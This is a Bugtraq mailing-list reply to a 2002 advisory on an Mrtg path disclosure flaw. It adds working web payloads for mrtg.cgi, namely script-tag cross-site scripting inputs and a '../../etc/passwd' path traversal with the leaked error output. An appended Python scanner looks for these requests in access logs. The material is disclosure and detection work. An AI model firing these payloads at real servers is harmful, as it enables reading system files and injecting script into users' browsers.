Bugtraq mailing list archives
Re: Mrtg Path Disclosure Vulnerability
From: "Frog Man" <leseulfrog () hotmail com>
Date: Mon, 04 Feb 2002 21:09:18 +0100
/mrtg.cgi?log=<script>alert('CSS')</script>
/mrtg.cgi?log=<script>alert('Cross Site Scripting')</script>
/mrtg.cgi?cfg=../../etc/passwd :

------------------- mrtg.cgi error ------------------------
Software error:
ERROR: CFG Error Unknown Option "root:PASS:0:0:root:/root" on line 2 or above. Check doc/reference.txt for Help
------------------- mrtg.cgi error ------------------------

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Mrtg Path Disclosure Vulnerability

Type:
Input Validation Error

Release Date:
February 4, 2002

Product / Vendor:
The Multi Router Traffic Grapher (Mrtg) is a tool to monitor the traffic load on network-links. Mrtg generates html pages containing gif images which provide a live visual representation of this traffic.
http://www.mrtg.org

Summary:
If an attacker submits a web request containing unexpected arguments for script variables, an error message will be displayed containing the path to the webroot directory of the server running the Mrtg cgi script.

http://host/mrtg.cgi?cfg=blabla

Tested:
Mrtg v2.090011
Mrtg v2.090006

Vulnerable:
Mrtg v2.090011
Mrtg v2.090006
And maybe others.

Disclaimer:
http://www.securityoffice.net is not responsible for the misuse or illegal use of any of the information and/or the software listed on this security advisory.

Author:
Tamer Sahin
ts () securityoffice net
http://www.securityoffice.net

Tamer Sahin
http://www.securityoffice.net

PGP Key ID: 0x2B5EDCB0
Fingerprint: B96A 5DFC E0D9 D615 8D28 7A1B BB8B A453 2B5E DCB0

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1

iQA/AwUBPF3TbLuLpFMrXtywEQIU5QCghYmngYvhwveU+8W3JwTz5QtsmU0AoJZD
Tbl6HDhKVnFPEy1DSB3/q3AH
=+kUc
-----END PGP SIGNATURE-----
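
A defender-side check for the requests discussed in this thread, added here as an example and not taken from the posts or from Mrtg itself: it scans web-server access logs for mrtg.cgi requests whose cfg or log parameter carries path traversal or markup, including percent-encoded and double-encoded forms, and notes error responses that may expose paths. The Common Log Format input, the sample lines and the finding labels are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (Common Log Format); hosts and times are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [04/Feb/2002:21:10:01 +0100] "GET /mrtg.cgi?cfg=router1.cfg HTTP/1.0" 200 5120
192.0.2.11 - - [04/Feb/2002:21:10:07 +0100] "GET /mrtg.cgi?cfg=blabla HTTP/1.0" 500 312
192.0.2.12 - - [04/Feb/2002:21:10:09 +0100] "GET /mrtg.cgi?cfg=../../etc/passwd HTTP/1.0" 500 401
192.0.2.12 - - [04/Feb/2002:21:10:15 +0100] "GET /mrtg.cgi?cfg=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.0" 500 401
192.0.2.13 - - [04/Feb/2002:21:10:20 +0100] "GET /mrtg.cgi?log=%3Cscript%3Ealert('CSS')%3C/script%3E HTTP/1.0" 200 880
"""

LINE_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %252e -> %2e -> .)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return the set of findings for one access-log line."""
    m = LINE_RE.search(line)
    if not m:
        return set()
    target, status = urlsplit(m.group(1)), int(m.group(2))
    if not target.path.endswith("/mrtg.cgi"):
        return set()
    findings = set()
    params = parse_qs(target.query, keep_blank_values=True)
    for name in ("cfg", "log"):
        for raw in params.get(name, []):
            value = fully_decode(raw)  # parse_qs already removed one encoding layer
            if ".." in value.replace("\\", "/").split("/") or value.startswith("/"):
                findings.add(f"{name}:path-traversal")
            if "<" in value or ">" in value:
                findings.add(f"{name}:markup")
    # A 5xx answer to a parameterised request is the error page the advisory describes.
    if status >= 500 and ("cfg" in params or "log" in params):
        findings.add("error-page")
    return findings

def scan(log_text):
    """Return (line, sorted findings) for every line with at least one finding."""
    return [(line, sorted(f)) for line in log_text.splitlines() if (f := classify(line))]
```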